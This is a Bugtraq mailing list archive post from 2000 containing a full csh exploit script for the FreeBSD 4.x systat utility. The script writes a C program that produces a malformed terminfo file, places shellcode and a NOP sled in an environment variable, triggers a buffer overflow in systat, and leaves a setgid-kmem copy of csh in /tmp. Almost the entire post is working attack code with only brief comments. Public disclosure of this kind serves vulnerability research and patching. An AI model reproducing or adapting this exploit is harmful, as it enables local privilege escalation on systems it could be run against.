Bugtraq mailing list archives
FreeBSD 4.x systat exploit
From: Przemyslaw Frasunek <venglin () FREEBSD LUBLIN PL>
Date: Tue, 10 Oct 2000 14:52:17 +0200
#!/bin/csh # (c) 2000 Przemysław Frasunek <venglin () freebsd lublin pl> # # FreeBSD 4.x systat gid=kmem exploit # Idea by: Jouko Pynnönen <jouko () SOLUTIONS FI> # # Dedicated to ksm. cat << __EOF__ > /tmp/xx #!/bin/csh cp /bin/csh /tmp /usr/sbin/chown venglin.kmem /tmp/csh chmod 2755 /tmp/csh __EOF__ chmod 755 /tmp/xx cat << __EOF__ > /tmp/sploitte.c #include <stdio.h> #include <string.h> #include <fcntl.h> #define OFF -400 #define ALIGN 516 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(void) { char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* precompiled terminfo binary header */ char evilcap[] = "\x1a\x01\x2a\x00\x26\x00\x21\x00\x82\x01\x09\x02\x73\x63\x72\x65" "\x65\x6e\x7c\x56\x54\x20\x31\x30\x30\x2f\x41\x4e\x53\x49\x20\x58" "\x33\x2e\x36\x34\x20\x76\x69\x72\x74\x75\x61\x6c\x20\x74\x65\x72" "\x6d\x69\x6e\x61\x6c"; char retbuf[5]; long ret = getesp() + OFF; int i; /* malicious terminfo binary */ write(2, evilcap, sizeof(evilcap)-1); for (i=0;i<39;i++) write(2, "\0", 1); for (i=0;i<86;i++) write(2, "\xff", 1); write(2, "\0\0", 2); for (i=0;i<750;i++) write(2, "\xff", 1); for (i=0;i<ALIGN;i++) write(2, "a", 1); sprintf(retbuf, "%c%c%c%c", ((int)ret & 0xff), (((int)ret & 0xff00) >> 8), (((int)ret & 0xff0000) >> 16), (((int)ret & 0xff000000) >> 24)); write(2, retbuf, 5); } __EOF__ # malformed terminfo binary. cc -o /tmp/s /tmp/sploitte.c cd $HOME mkdir -p .terminfo/s /tmp/s >& .terminfo/s/screen setenv TERM screen # plenty of nops - usually adjusting offset isn't needed. setenv EGG `perl -e 'print "\x90" x 10000 ; print "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/xx\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"'` # boom. /usr/bin/systat >& /dev/null # cleaning up. rm -f .terminfo/s/screen ls -la /tmp/csh -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
Current thread:
- FreeBSD 4.x systat exploit Przemyslaw Frasunek (Oct 10)
- Re: FreeBSD 4.x systat exploit Steve Reid (Oct 10)